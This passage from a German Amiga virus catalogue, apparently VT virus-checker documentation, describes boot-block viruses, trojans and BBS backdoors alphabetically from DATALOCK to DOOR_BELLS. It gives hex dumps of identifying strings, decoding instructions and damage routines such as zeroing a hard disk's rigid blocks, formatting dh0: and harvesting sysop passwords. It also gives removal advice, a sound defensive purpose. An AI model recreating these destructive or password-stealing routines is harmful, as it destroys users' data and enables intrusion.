ab $7F700 Verbogene Vektoren: DoIo, KickTag und im Prg. dann DisplayAlert Fordert trackdisk.device NICHT !!! Ich hab das mit der SyQuest ausprobiert. Wenn Sie KEIN backup vom Rigidbereich Ihrer Festplatte haben, bekommen Sie Probleme. Vermehrung: BB Meldung: soll sich in Abhaengigkeit von einer Zaehlzelle mit Displayalert melden. Version 1.1 : - in Abhaengigkeit von Zaehlzelle: - schreibt BB 2 Bloecke lang kein Problem - schreibt Speicher ab $7FAAD nach $6E000 auf Medium. Bei einer DD-Disk ist das der Rootblock (880). Ich mache Ihnen wenig Hoffnung. Probieren Sie Disksalv2. - schreibt Speicher ab $7FAAD nach $6F400 auf Medium. Bei einer DD-Disk ist das Block 890. Es werden $1000 Bytes = 8 Bloecke !!! geschrieben. Also ist in 890 "DATALOCK" zu lesen und die folgenden Bloecke sind AUCH unbrauchbar, weil sie Speichermuell enthalten. Auszug mit VT-drucke: 0000: 0a444154 414c4f43 4b20312e 31202863 .DATALOCK 1.1 (c 0010: 29206039 34210000 414c4c20 283f2920 ) `94!..ALL (?) 0020: 434f4445 20425920 44454154 48434f52 CODE BY DEATHCOR 0030: 452e0007 fae60000 00004afc 0007fae6 E.........J..... usw. Version 1.2 : - in Abhaengigkeit von Zaehlzelle: - schreibt BB ABER immer $800 also 4 Bloecke. Falls also ein File auf dieser Disk Block 2 u. 3 von Zylinder 0 belegt hat, so wird es immer unbrauchbar. Test mit VT BlockKette ergibt bad Data !!! - schreibt Speicher ab $7FAAD nach $6E000 auf Medium. Bei einer DD-Disk ist das der Rootblock (880). Ich mache Ihnen wenig Hoffnung. Probieren Sie Disksalv2. - berechnet ueber $DFF006 einen Block und schreibt Speicher ab $7FAAD in diesen Block. Da $800 = 4 Bloecke geschrieben wer- den, enthalten die folgenden Bloecke Speichermuell und sind AUCH unbrauchbar. Auszug mit VT-drucke: 0000: 0f3e3e3e 20444154 414c4f43 4b20312e .>>> DATALOCK 1. 0010: 32203c3c 3c206039 34210001 00be1b28 2 <<< `94!.....( 0020: 63292062 79204445 41544843 4f52452e c) by DEATHCORE. 0030: 00000007 fae60000 00004afc 0007fae6 ..........J..... - DATALOCK Installer File Laenge gepackt: 1996 Bytes Laenge entpackt: 2992 Bytes Soll DATALOCK-BB (siehe oben) auf BB schreiben. Selbst keine verbogenen Vektoren. Keine Vermehrung KS1.3: ja KS2.04: bei mir nur wirre Zeichen auf dem Bildschirm. Dringende Empfehlung: loeschen Hinweis 15.02.95: Es wurde der Installer noch einmal gefunden. Nur enthaelt er jetzt den ASS-Anti-BB. Im File ist zu lesen: 2e200001 00552e2a 2a2a2054 68616e6b . ...U.*** Thank 7320746f 20746865 20415353 20564952 s to the ASS VIR 55532050 524f5445 43544f52 2056312e US PROTECTOR V1. Sie machen also NICHTS falsch, wenn Sie dieses Teil AUCH loeschen. Es scheint hier jemand einmal eine allgemeine BB-Install-Routine geschrieben zu haben. - DEBUGGER-Virus Link Verlaengert ein File um 1088 Bytes KS 1.3 : GURU (wg. z.B. CacheClearU) KS 2.0 : ja Verbogene Vektoren: DosWrite, LoadSeg Nicht resetfest Aktivierung im Speicher: Nur wenn in Dos.lib $4EF9 verwendet wird. Vermehrung: Ein Orig-Teil im 1.Hunk wird ans Fileende gerettet und durch ein Virusteil ersetzt. Das 2.Virusteil haengt auch am File- ende in einem 3F1-Hunk . Bedingungen: File ausfuehrbar 3F3 die ersten 4 Bytes des 1. Hunks enthalten weder $4e75 noch $4afc (wg. Lib) Medium validated #82 #8192 Bloecke frei also keine Disk der 1.Hunk mindestens eine bestimmte Laenge hat VT versucht den Ausbau. Am Ende eines verseuchten Files ist zu lesen: 23c00000 20444542 55474745 52283034 #... DEBUGGER(04 31393934 292043fa 1994) C.. - Decompiler-Trojan Laenge: 53992 Bytes Name: so heisst das File Verbogene Vektoren: Keine Nicht Resetfest Keine Vermehrung Schaeden: Verlaengert libs, l, devs und fonts um ein Leer- zeichen. Sie bekommen also Probleme beim naechsten Bootvor- gang, da die Dir-Namen nicht mehr stimmen. Abhilfe: Laden Sie ein Dir-Util-Prg. und entfernen Sie jeweils das Leerzeichen. VT bietet Loeschen an. Im File ist zu lesen: 7379733a 6c696273 00097379 733a6c69 sys:libs..sys:li 62732000 00057379 733a6c00 00067379 bs ...sys:l...sy 733a6c20 00087379 733a6465 76730009 s:l ..sys:devs.. 7379733a 44657673 20000009 7379733a sys:Devs ...sys: 666f6e74 7300000a 7379733a 666f6e74 fonts...sys:font 73200000 00000000 000003f2 000003e9 s .............. Das File meldet sich auf dem Bildschirm mit: Autoboot disk creator Angeblich soll ein ausgewaehltes compiliertes Programm in die startup-seq. uebernommen werden. Dieses Trojanteil koennte auch als AMOS-Utility weitergegeben werden. Hinweis Okt.94: Im Moment kommt es bei einigen Antivirusprogrammen bei jedem 3. oder 4. Amosfile zu einer Decompiler-Fehlerkennung. Beispiel: Bavarian 333 AMastermind Das File enthaelt den Decompiler aber NICHT !!!!! Ich nehme an, dass diese Fehlerkennungen bei den naechsten Updates behoben sein werden. - Degrad-Trojan reines Zerstoerungsfile Laenge ungepackt: 5612 Bytes Keine verbogenen Vektoren Nicht resetfest Name nicht nachvollziehbar, sondern uebernommen. Im File ist uncodiert zu lesen (danach sehr viele 0) : fe3e4e75 73637369 2e646576 69636500 .>Nuscsi.device. 00000000 00000000 00000000 00000000 ................ 00000000 00000000 00000000 00000000 ................ ;...usw Zerstoerung: Nach Aufruf (Cli) wird versucht Unit 0 mit scsi.device zu oeffnen. Falls gefunden, werden #5120 Bytes mit Nullen ab Sektor Null geschrieben. Dies duerfte den Rigid-Bereich der Festplatte unbrauchbar machen. Aber Sie haben natuerlich laengst ein Backup des Rigid-Bereichs ihrer Festplatte, oder etwa doch nicht ? (zeige Zyl/Backup) VT bietet loeschen an - Deniz Cool SCA-Clone nur Text geaendert - DERK1 u. 2 BB richtiger Name: MALLANDER VIRUS V1.0 Hinweis: Derk1=Derk2 Beweis fuer Nichtassemblerfreaks: nutzen Sie die Funktion vgl. in VT . Die 1 und 2 in der BB-Checksum ergeben sich aus den abgespeicherten unterschiedlichen DoIo's. Sonst KEINE Unterschiede . - Descriptor-Virus ein Zerstoerungsfile Laenge: 7016 Bytes Namensbegruendung: s.u. Keine verbogenen Vektoren Testet auf mindestens KS2.04 s.u. Sucht nach S:Descriptions.TXT Behauptet Snap zu suchen, holt aber in Wirklichkeit aus c den delete-Befehl und loescht alle Files. Durch die verbrauchte Zeit sollte Ihnen das schon auffallen. Wenn Sie danach das About-Gadget anklicken, erhalten Sie die Ausgabe: Your HD is ... s.u. Das Programm loescht aber GENAUSO ihre Disk . VT bietet nur loeschen an, da die Zerstoerungs-Routine EINGEARBEITET und nicht angelinkt ist. Es soll aber auch ein SAUBERES Descriptor-Programm geben (hab ich nicht). Das echte Programm soll Logos an Files an- haengen. Also wird die Hauptgefahr "nur" die Sysops treffen. Fileauszuege: 6F757263 65006465 6C657465 203A233F ource.delete :#? 20616C6C 20200000 80000064 00000000 all .....d.... ;.... 2F313032 2F446573 63726970 746F7220 /102/Descriptor 56332E30 20627920 436F6C6F 72626F79 V3.0 by Colorboy 206F6620 5375626D 69737369 6F6E206F of Submission o 6E203239 2D4A554E 2D313939 332F6E6F n 29-JUN-1993/no ;.... 6E6F7369 7A650000 533A4465 73637269 nosize..S:Descri 7074696F 6E732E54 58540000 0C0A9B33 ptions.TXT.....3 ;.... 64212057 68617420 61626F75 74206B69 d! What about ki 636B2032 2E303F0A 45697468 65722049 ck 2.0?.Either I ;.... 9B31303B 31304853 6E617020 6973206E .10;10HSnap is n 6F742069 6E206D65 6D6F7279 2E204920 ot in memory. I 74727920 746F206C 6F616420 69742066 try to load it f 726F6D20 432D4469 722E2020 20202020 rom C-Dir. ;.... 5B33316D 0A0A2020 2DF721F7 2D202059 [31m.. -:-!: Y 6F757220 48442069 73206465 6C657465 our HD is delete 64202E2E 2E204861 70707920 42697274 d ... Happy Birt 68646179 202D4D43 492D2F44 43532041 hday -MCI-/DCS A 48484148 41484148 41484148 4120202D HHAHAHAHAHAHA - Hinweis 01.08.93: Das Zerstoerungsteil wird auch als zsped.lha weiter- gegeben. Laenge: 20817 Bytes (allerdings mit mehreren Boxenhinweisen). Das Virusteil nennt sich dort SPEEDER.EXE (Laenge: 7016). Also nur ein anderer Name. Die Doc ver- sucht zu verwirren, indem sie die Funktion des Programms falsch beschreibt. SPEEDER.DOC: Just RUn Speeder.exe From Ram And Watch YER CPS CLIMB On You Next Transfer Mine Increased from 1600 to 1800 On normal 14.4 HST SAMIR ZENITH LEADER Watch For Our releases!!!!! - Destructor Cold im BB sichtbar: Destructor_Virus v1.2 Written by Aldo Reset. (c) M.C.T. Ltd 1990- Everything is under control ! (eh!eh!) keine Vermehrungsroutine gefunden zerstoert beim naechsten Reset ueber Cold eine nicht schreibgeschuetzte Disk indem jeder 4. Track ueberschrieben wird. - DETLEF-Virus BB KickTag, KickCheckSum, DoIo Namensbegruendung: siehe unten Fordert trackdisk.device NICHT BB wird in den Speicher decodiert mit: add.b d1,(a0)+ Jeder neu geschriebene Virus-BB wird neu codiert in Abhaengig- keit von $DFF00A . In Abhaengigkeit von $DFF006 wird mit DisplayAlert ein Text ausgegeben. Dazu wird ein Virusteil nach $73000 kopiert und mit add.b #$ad,(a0)+ decodiert. AlertText: Guten Tag. » Ich heiße DETLEF « Ich werde Sie in der nächsten Zeit etwas nerven. Gemacht wurde ich von · M A X . Vermehrung und Schaden: BB - Devil_V8_B.Door anderer Name:SwiftWare Laenge ungepackt: 44224 Ein Hunk wurde vor das Originalfile gehaengt, um das Sysop-Pass- word auslesen zu koennen und in einem neuen File abzulegen. Ein Teil des 1.Hunks decodiert mit neg.b (a0)+ ergibt: 6262 bb 733A6E6F 6465302F 6E6F6361 6C6C6572 s:node0/nocaller 73617433 30300062 62733A75 7365722E sat300.bbs:user. 64617461 00 data. Da das Teil sich nicht vermehrt, handelt es sich nach der Definition nicht um einen Virus. Namensbegruendung: Eine Gruppe (oder Einzelperson) soll fuer diese BBS-Einbrueche verantwortlich sein. Kann ich nicht nach- pruefen. VT bietet den Ausbau an. - Devil_11_B.Door Drei Files sind mir bekannt, vor die das Teil gehaengt wurde: - DLog V1.8 Laenge verseucht: 23452 - ULog V1.8 Laenge verseucht: 23452 - MsgTop V1.0 Laenge verseucht,aber einmal entpackt: 17884 2x gepackt: 13548 Alle drei Prg.e verseucht auf A4000 = GURU 4 BackDoor-Teil ausgebaut, aber ohne BBS: = Fehler -1 Wenn Sie das BackDoorTeil entpacken, finden Sie gleich am An- fang: 000003e9 0000093d 4efa09ac 42425300 .......=N...BBS. 44483000 44483100 4844303a 00484431 DH0.DH1.HD0:.HD1 3a004448 30004448 31004844 303a0048 :.DH0.DH1.HD0:.H 44313a00 4242533a 00444830 3a424253 D1:.BBS:.DH0:BBS 2f004448 313a4242 532f0048 44303a42 /.DH1:BBS/.HD0:B 42532f00 4844313a 4242532f 00444830 BS/.HD1:BBS/.DH0 3a004448 313a0048 44303a00 4844313a :.DH1:.HD0:.HD1: Mit SnoopDos koennen Sie das nachvollziehen. Schaden: (Die folgende Aussage wurde uebernommen) Sucht nach Files mit Laenge 1972 Bytes und aendert sie so ab, dass ab Level 10 Account edit und Sysop download moeglich wird. Da das Teil sich nicht vermehrt, handelt es sich nach der Definition nicht um einen Virus. Namensbegruendung: Eine Gruppe (oder Einzelperson) soll fuer diese BBS-Einbrueche verantwortlich sein. Kann ich nicht nach- pruefen. VT bietet den Ausbau an. Nachtrag 25.03.95: vgl. auch ZINE-Disk-Validator Nachtrag 15.04.95: vgl. auch VScan-BBS-Trojan - DEVIL-ZINE siehe bei ZINE-Disk-Validator - DiavoloR-zerst. ? KEIN Virus Fremdaussage: Die Files wurden von einer Diavolo-Raubkopie un- brauchbar gemacht. Da nur auf zwei Langworte getestet werden kann, ist die Ausgabe moeglicherweise nicht immer richtig. In so einem File ist zu lesen: DmsToy 0000: 43726163 6b656421 00000004 00000000 Cracked!........ 0010: 00000003 00000012 40001272 40001a2f ........@..r@../ - Died siehe bei PP-Bomb - DIGITAL AGE = Rude Xerox = Forpib-Clone nur Text geaendert - DIGITAL-DREAM-Inst. File anderer Name: Jeffkiller V2.67 Laenge gepackt : 6496 Bytes Laenge entpackt: 9960 Bytes Man erkennt, dass es sich um ein Hunklab-File handelt. - Ein Virusinstall-Teil fuer den Speicher. - Ein Bildanzeigeteil mit Bilddaten - Ein Code um Jeffkiller.info auf die Disk zu schreiben. Jeffkiller.info Laenge: 54 Bytes 4a656666 76697275 73206f6e 20446973 Jeffvirus on Dis 6b207761 73206b69 6c6c6564 2e2e2e0a k was killed.... 6279204a 6566666b 696c6c65 72205632 by Jeffkiller V2 2e363720 0a000000 00000000 00000000 .67 ............ Das Teil behauptet im Bild ein Jeff-Killer zu sein. In Wirk- lichkeit wird im Speicher das BB-Virusteil installiert. Wenn Sie mit der Maustaste einen Suchvorgang ausloesen, wird auf die Disk auch ein Textfile s.o. geschrieben. VT bietet loeschen an. - DIGITAL-DREAM-Virus BB (0-3) Im Speicher immer ab $7f400 Verbogene Vektoren: Supervisor, DoIo, KickTag, KickChecksum KS1.3 : ja KS2.04: ja 68030: nein Fordert trackdisk.device NICHT Namensbegruendung: im decodierten BB ist zu lesen 203e3e44 49474954 414c2044 5245414d >>DIGITAL DREAM 3c3c2000 6279204d 6178206f 66205374 << .by Max of St 61724c69 67687400 48e7fffe 2c790000 arLight.H...,y.. Ablauf: - rettet Orig.BB - Haengt eigenes Virusteil davor. - Codiert BB-Virus mit eor.b x,(a0)+ neu. (x abhaengig von $DFF006) - Schreibt 4 Bloecke zurueck. D.h. ein File das an Block 2 beginnt, wird zerstoert. Sie koennen die Reste des Files nur noch loeschen. VT bietet an, den Orig.BB zu suchen (O-BB) und kann ihn wieder installieren. - DIGITAL EMOTIONS Cool, im Prg. DoIo und zurueck, immer $7ec00 im BB immer sichtbar: *** DIGITAL EMOTIONS *** je nach Zaehlerstand - wird eigener BB geschrieben oder - Track 0 mit 'VIRUS ' beschrieben. Folge: keine Dos-Disk Textausgabe (decodiert mit -1) ueber DisplayAlert: KickStart ROM Corrupted at $c00276 - DirtyTricks richtiger Name Incognito (das VirusPrg speichert am Ende des BB`s Tabellen mit ab, die sich nach Speicherlage und Konfiguration des Amiga aendern. Beim Booten des Viruses werden die Tabellen neu angelegt !!!) - DISASTER MASTER V2 ( cls * ) 1740 Bytes eigenstaendiges Prg. fuer startup-sequence KickTag, KickCheck im Prg. DoIo und wieder zurueck Cool und Cold werden geloescht Entfernung: 1.Zeile in startup. loeschen cls in DfX:c loeschen Erstellungsprogramm: Intro-Maker von T.C.R. Laenge: 10624 Bytes (war vor der Entdeckung z.B. auf Franz 47) - DISGUST BB Cool $7EDDE, DoIo $7ECA4 im Speicher immer $7EC00 KS2.04: GURU nach RESET Fordert trackdisk.device NICHT Schaden und Vermehrung: ueber BB Versucht durch im BB lesbaren Text zu taeuschen: 003e2041 6d696761 .> Amiga 20353030 20557469 6c697479 2020426f 500 Utility Bo 6f74426c 6f636b20 56310030 20546869 otBlock V1.0 Thi 73206973 204e4f20 56697275 73203c00 s is NO Virus <. Namensbegruendung: Decodiert mit : not.b (a1) eori.b #$28,(a1)+ steht im Speicher: 20546869 Thi 73206973 20746865 20444953 47555354 s is the DISGUST 202d2056 69727573 20627920 4d617820 - Virus by Max - DiskSalv 3.01 Loader siehe bei MODEMCHECK-Virus - DiskSpeeder-Trojan andere moegliche Namen: GVP-HardDiskSpeeder Karacic-Trojan siehe dort - Disk Speed Check V1.01ß Virus anderer Name: DSC101 s.u. - Disk-Doktors (KickV1.2) Die angeblichen Mutanten unterscheiden sich in $4 (Pruefsumme) und von $390-$3A8 (Variablenablage = bei jedem Reset anders) - Disk-Herpes Cool, im Prg. DoIo, im Speicher immer ab $7ec00 wird haeufig mit Phantasmumble verwechselt, Fastmem ja Vermehrung: ueber BB Schaden: schreibt auf Track 80 (Root) Speicherinhalt ab $60000. Folge: Disk BAD Graphikroutine: Deutschlandfahne + Text (auch im BB sichtbar) --- Hello Computerfreak --- You've got now your first VIRUS ** D i s k - H e r p e s ** Many Disks are infected !! Written by >tshteopghraanptha< c 27.07.1987 in Berlin - Disk.info Laenge: 370 Bytes KEINE Vermehrung Ein OriginalWB1.3-Icon wurde in der Struktur geaendert. (Text eingebaut z.B. This is a little present for all Lamers abroad ). Sobald Sie diese Disk einlegen und es muesste das Disk-Icon auf der WB angezeigt werden, stuerzt der Rechner ab. Haben Sie die Startup-Sequence im Cli abgebrochen, so muss kein Icon dargestellt werden und deshalb koennen Sie mit dieser Disk ohne Probleme arbeiten. AbHilfe: Ersetzen Sie Disk.info . Herkunft: unbekannt (Disk-Packer ???) - DISK-KILLER V1.0 File Laenge ungepackt: 1368 Bytes Unter welchem Filenamen das Programm weitergegeben wird, ist mir unbekannt. (wahrscheinlich disktest) Namensbegruendung: im File steht uncodiert: 20204449 534b2d4b 494c4c45 52205631 DISK-KILLER V1 2e302020 200a .0 . Nach dem Fileaufruf wird folgender Text ausgegeben: " DISK-KILLER V1.0 ",10 "HEY YOU IN FRONT OF THE SCREEN !",10 "YOU ARE A LAMER !!!! HE HE HE ",10 "WHY ????",10 "- BECAUSE YOU HAVE A VIRUS !!",10 "HE HE HE ",10 "THIS WAS DONE IN TEN MINUTES",10 "BY THE MEGA-MIGHTY MAX ",10 "BYE BYE DISK !!",10 "GREETS ARE GOING TO:",10 "> LAMER EXTERMINATOR <",10 "SUFFER...",10 Danach beginnt SOFORT die Zerstoerungsarbeit in ALLEN Disk- Laufwerken. Die Disketten sind danach WERTLOS. Sie muessen sie neu formatieren. Das Virusteil ist also NICHT im Speicher zu finden, sondern nur beim Filetest. Von der Definition her handelt es sich nicht um ein Virus-Programm, da keine Ver- mehrung angestrebt wird. VT getestet: 21.11.92 Bitte ueber- pruefen Sie nach dem Loeschen des Files auch die startup- sequence ihrer Disk. siehe auch: XaCa lummin V1.5 = Clone - Disk-Terminator Virus BB SCA-Clone siehe unten Namensbegruendung: im BB ist zu lesen 20202044 69736b2d 5465726d 696e6174 Disk-Terminat 6f722056 69727573 20202020 2020d2aa or Virus .. Anfaengerprogrammierung: graphics.library liegt an ungerader Adresse. GURU ist sicher fe018000 00ffffff fe0428ff fafbd367 ..........(....g 72617068 6963732e 6c696272 61727900 raphics.library. ^ Weiterer Auszug: 43fa lea 743(PC)(=$a030f),A1 2c79 move.l $000004,A6 4eae jsr -96(A6) 2040 move.l D0,A0 2068 move.l 22(A0),A0 7000 moveq #$00,D0 4e75 rts doslibname wird an ungerader Adresse gesucht, ist aber an ge- rader Adresse. Also wird nach Name gesucht, der mit 0 beginnt. (siehe ^ ) GURU ist sicher. Verantwortlich zeichnet SLASH - Disktroyer V1.0 File Laenge ungepackt: 804 Bytes AllocMem auch mit KS2.04 Versucht durch Loeschen des Cli-Fensters zu taeuschen. Ich vermute deshalb, dass das File als Cls-Befehl getarnt wird. Im File zu lesen: Disktroyer V1.0 usw. Keine Vermehrungsroutine Schaeden, wenn: - allocmem angesprungen wird und - in der Zaehlzelle der Wert $96 steht - Disk im Laufwerk liegt - Disk nicht schreibgeschuetzt ist dann: - Kopfstep (Zerstoerung der Disk(s)) alle Laufwerke (Routinen stehen nach meiner Meinung genau so in einem bekannten Buch !!!!!) - DisplayAlert: Disktroyer V1.0 usw. Empfehlung: File loeschen (VT) und startup-sequence ueber- pruefen . - Disktroyer V2.0 File Laenge ungepackt: 812 Bytes GetMsg auch mit KS2.04 Versucht durch Loeschen des Cli-Fensters zu taeuschen. Ich vermute deshalb, dass das File als Cls-Befehl getarnt wird. Im File zu lesen: 01041444 69736b74 726f7965 72205632 ...Disktroyer V2 2e300001 00c82828 77292061 6e6420a9 .0....((w) and . 20313939 31206279 20746865 20706f77 1991 by the pow 65726675 6c200001 01003c54 68652046 erful ....<The F 616e6174 69632043 72657720 00010098 anatic Crew .... usw. ..... Keine Vermehrungsroutine Schaeden, wenn: - GetMsg angesprungen wird und - in der Zaehlzelle der Wert $222222 steht (Wert wird zuegig erreicht) - Disk im Laufwerk liegt - Disk nicht schreibgeschuetzt ist dann: - Kopfstep (Zerstoerung der Disk(s)) alle Laufwerke (Routinen stehen nach meiner Meinung genau so in einem bekannten Buch !!!!!) - DisplayAlert: Disktroyer V2.0 usw. Empfehlung: File loeschen (VT) und startup-sequence ueber- pruefen . - Disk-Val. RTS (L) File Loeschen Laenge 1848 Bytes KEIN Virus Das Original wurde durch ein File ersetzt, das nur RTS enthaelt, also die Disk-Validator-Funktion NICHT erfuellen kann. Empfehlung: Durch Original ersetzen. Im File ist zu lesen: 000001c5 60040000 005c70ff 4e750000 ....`....\p.Nu.. ;Rest nur Null - Disk-Val.Tr.moDOS File NICHT loeschen Laenge 1848 Bytes KEIN Virus Gefunden wurde das Teil auf Disks mit BB-Loadern und NICHT-DOS- Disk-Format. Das Teil darf NICHT geloescht werden, da anscheinend der Disk-Validator fuer die andere Disk-Struktur umgeschrieben wurde. Im File ist zu lesen: 20547261 636b6d6f 444f5320 312e3020 TrackmoDOS 1.0 - DiskVal1234 Disk-Validator Laenge:1848 Bytes Grundgeruest ist der SADDAM-Disk-Validator (siehe unten) Aenderungen: nicht mehr codiert als Disk-Validator (lesbar am Fileende z.B. strap, mycon.write usw ) Veraendert Bloecke die mit 8 beginnen: Schreibt in diese Bloecke nach $5a 1234 und ab $64 dann 66x 4e71 (NOP). (Also nicht mehr Austausch von 8 mit IRAK) Rufen Sie dann ein solches File auf, so stuerzt der Rechner ab, da ja wichtiger PrgCode mit NOPs ueberschrieben wurde (bei mir wird der Bildschirm gelbbraun). So leid es mir tut, diese Files koennen NICHT gerettet wer- den. VT bietet loeschen an. Es kann also sein, dass ihre ganze Disk unbrauchbar wird. - DiVa-SADDAM-Inst. File Anderer Name: LamerKiller Laenge gepackt: 11512 Bytes KS1.3 Ja KS2.04 GURU3 Verbogene Vektoren: Cold, BeginIo usw. Installiert SADDAM-Disk-Validator (codiert IRAK) Keine Meldung im Cli - DIVINA EXTERMINATOR I Cool, DoIo, Inter.5 und $64. Im Prg dann noch $68 und $6c. Ueberschreibt SetPatchListe ab $C0. Codiert BB neu mit Wert aus $DFF006 (steht dann im BB $3F6) nach eor.w d0,d1 ist im Speicher zu lesen: VIRGO PRESENTS DIVINA EXTERMINATOR I Versucht einen sauberen OrigBB vorzutaeuschen. Schaeden und Vermehrung: BB nach 3 Vermehrungen: beginnt die K-Taste abzufragen und bis 10 in einer Zaehlzelle abzulegen. Dann wird nach $4 (ExecBase- Zeiger) der Wert 0 geschrieben = Absturz Ursprung: -p-turbo.dms - DIVINA II s.o. DIVINA EXTERMINATOR I Das Decodierwort in $3F6 ist anders. Grund s.o. (schafft endlich die Brainfiles ab !!! und disassembliert den VirenCode sauber und vollstaendig) - DLog V1.8 siehe oben Devil_11_B.Door - DM-Trash File siehe bei ZAPA-B.Door - DMS206-Trojan anderer Name Fastcall-Trojan Filename:dms206.exe Laenge:45732 Bytes Das Programm meldet sich auch so. Aber mir ist keine DMS-Version 2.06 bekannt (Stand:05.01.95). Also bitte Vorsicht. Keine verbogenen Vektoren. Keine Vermehrung . In Wirklichkeit wurde mit der $4EB9-Methode (s.o.) ein Einbruchs- werkzeug gegen Fastcall (nehme ich an) angehaengt. Vgl. auch Viewtek22-Installer und LHAV3-BBS-Trojan. Es ist ein SEHR aehnliches Muster, nur der Username wechselt. Decodiert mit eori.b #$EE,(a0)+ ist in dem Trojanteil zu lesen: "S:HauptPfad",0 "User/SYSOP/Userdaten",0 ;....... "SnoopDos",0 Zuerst wird nach aktivem SnoopDos gesucht. Falls gefunden: Abbruch mit Selbstloeschung im Speicher. VT bietet Ausbau an. Aber Vorsicht bitte wg. der DMS-Vers.Nr. DMS-File Laenge ohne Trojan: 43952 Bytes - DMS213-Trojan Zerstoerungsfile Laenge ungepackt: 92440 Bytes Keine verbogenen Vektoren Die DMS-Version 2.13 gibt es noch nicht (Stand: 15.06.94) Zerstoerung: Vom Filebeginn wird mit JMP in eine Execute-Routine am File- ende gesprungen, die eine Formatierung von dh0: ausfuehren soll. VT bietet Ausbau an (Laenge dann: 92208 Bytes). Es duerfte sich hierbei um DMS2.01 handeln. Im entstehenden File bleiben noch einige falsche Textstellen zurueck. Da es inzwischen (Stand: 15.06.94) neuere DMS-Versionen geben soll, waere es mir lieber, Sie loeschen das File ganz und spielen eine saubere Version neu auf. Danke Im verseuchten File ist zu lesen: 646f732e 6c696272 61727900 24564552 dos.library.$VER 3a204465 76696365 2d4d6173 6865722d : Device-Masher- 53797374 656d2076 322e3133 2039342d System v2.13 94- 30362d30 31004e55 ffe448e7 37322648 06-01.NU..H.72&H ;........ 20534365 4e452069 53204c61 4d45202d SCeNE iS LaME - 20536947 4e654420 42792052 6f414453 SiGNeD By RoADS 54615252 2f4c7344 20202020 20202020 TaRR/LsD 646f732e 6c696272 61727900 666f726d dos.library.form 61742064 72697665 20646830 3a206e61 at drive dh0: na 6d652046 75434b6f 46462066 66732071 me FuCKoFF ffs q 7569636b 0a8c018d 000003ec 00000003 uick............ Eine echte Meisterleistung !!!! - Doom-Trojan File gegen BBS Laenge gepackt: 406012 Bytes Laenge entpackt: 407688 Bytes Das File enthaelt 380KB Muell (DMSMaPuS, ProTracker usw.) . Wahrscheinlich soll die Filelaenge eine Doom-Variante glaub- haft machen. Wenn man den Rest des File mit not.b d0 decodiert, findet man drei Files (assign, copy und diskfont.library), ein Ueberschreibfile (s.u.) und einen Text: f7fdfbef f8fd646f 732e6c69 62726172 ......dos.librar 79005245 53544943 54454400 6262733a y.RESTICTED.bbs: 75736572 2e646174 61006262 733a7573 user.data.bbs:us 65722e6b 65797300 633a436f 70790063 er.keys.c:Copy.c 3a417373 69676e00 6c696273 3a646973 :Assign.libs:dis 6b666f6e 742e6c69 62726172 79000000 kfont.library... Aufgabe des "sinnvollen" Teiles: - decodiere mit not.b d0 - Kopiere 3 Files (Dos-Funktionen). - setze bei copy und assign mit setfiledate (ab KS 2.04) das Datum 2. Sept 1992 - setze bei diskfont.library das Datum 10. Juni 1994 - setze pure-Flag bei assign und copy - setze execute-Flag bei diskfont.library - setcomment RESTICTED bei user.data und user.key - arbeitet mit getprgname (ab KS 2.04) und ueberschreibt das Ursprungs-Doom-File mit einem neuen Prg. Laenge:32020 Bytes Dieses neue Prg veraendert Bildschirmausgabe und Audiodaten. Dieses Programm enthaelt wieder jede Menge Muell-Bytes, die nie erreicht werden. Etwas sinnvolles habe ich bei Tests auf dem Monitor mit diesem neuen File NICHT gesehen. Dringende Empfehlung: Loeschen - Doom-Assign File Original-Assign duerfte sein: 37.4 (25.4.91) 3220 Bytes Assign-Trojan gepackt: 3220 Bytes Es wurde also Wert darauf gelegt, die Laenge gleich zu halten. Dennoch MUSS das File in c auffallen, da es sich um einen seltenen Packer handelt. Das Trojan-Assign kann sich NICHT selbst vermehren. Die Assign-Funktion wird erfuellt. Verbiegt $74 (s.u. bei diskfont.library) Aber: die Bytes auf die getestet wird sind anders: - 66495265 664C7921 0D - "fIRefLy!",0d Empfehlung: Loeschen und Original-Assign aufspielen. - Doom-Copy File Original-Copy duerfte sein: 38.1 (20.5.92) 5496 Bytes Copy-Trojan gepackt: 5496 Bytes Es wurde also Wert darauf gelegt, die Laenge gleich zu halten. Dennoch MUSS das File in c auffallen, da es sich um einen seltenen Packer handelt. Das Trojan-Copy kann sich NICHT selbst vermehren. Die Copy-Funktion wird erfuellt. Verbiegt $74 (s.u. bei diskfont.library) Aber: die Bytes auf die getestet wird sind anders: - 6C554E69 54496321 0D - "lUNiTIc!",0d Empfehlung: Loeschen und Original-Copy aufspielen. - Doom-diskfont.library File Original duerfte sein: 39.3 (14.7.92) 15340 Bytes Doom-diskfont.library NICHT gepackt : 15820 Bytes Die Trojan-diskfont.library kann sich NICHT selbst vermehren. Die diskfont.library-Funktionen werden erfuellt. Es wurde ein kleines Trojanteil eingebaut. Um diesen Code auszufuehren, wurde vor viele RTS im Original-Prg. ein Sprung- befehl gesetzt. Original: Trojan: 020: 00000dc3 70ff4e75 ....p.Nu 020: 00000e38 70ff6100 ...8p.a. ^^^^ 028: 4afc0000 00040000 J....... 028: 376c4e75 4afc0000 7lNuJ... ^^^^ ;.... 128: 4e754caf 00030004 NuL..... 128: 00402c5f 61003666 .@,_a.6f ^^^^^^^^ 130: c0ef000a c2ef0008 ........ 130: 4e754caf 00030004 ;usw.... Empfehlung: Loeschen und Original aufspielen. Enthaltenes Trojan-Teil: - Test auf mind. 68010 dann VBR sonst Zero-Page - Test ob $74 schon verseucht (#$48E7C0C0) - falls nein - rette Orig-$74-Adresse - belege 2x Speicher - verbiege Adresse - kopiere Virusteil in Speicher Kopiertes Trojan-Teil: - sucht ueber $DFF018 (seriell) nach einzelnen Bytes - 4B696E47 41436821 0D - "KinGACh!",0d Damit kann ich nichts anfangen. Das Teil duerfte "nur" fuer Mailbox-Betreiber gefaehrlich sein. - DOOR_BELLS-Virus ?? File Laenge ungepackt: 15308 Bytes anderer Name: MST-VEC Virus, Rel 01.28 Virus Keine verbogenen Vektoren. Bei mir nicht lauffaehig, da eine rexxplslib.library gefordert wird, die ich nicht habe. Vermutlich sollen verschiedene LWe schnellformatiert werden. Einen aehnlichen Vorgang finden Sie auch im MultiChat-Trojan. (siehe unten) Fileauszug: 636f7079 203e4e49 4c3a2073 79733a73 copy >NIL: sys:s 79737465 6d2f666f 726d6174 2072616d ystem/format ram 3a646400 00060542 72616d3a 64640045 :dd....Bram:dd.E 05387261 6d3a6464 203e4e49 4c3a2044 .8ram:dd >NIL: D 52495645 20737973 3a204e41 4d45203d RIVE sys: NAME = 444f4f52 5f42454c 4c533d20 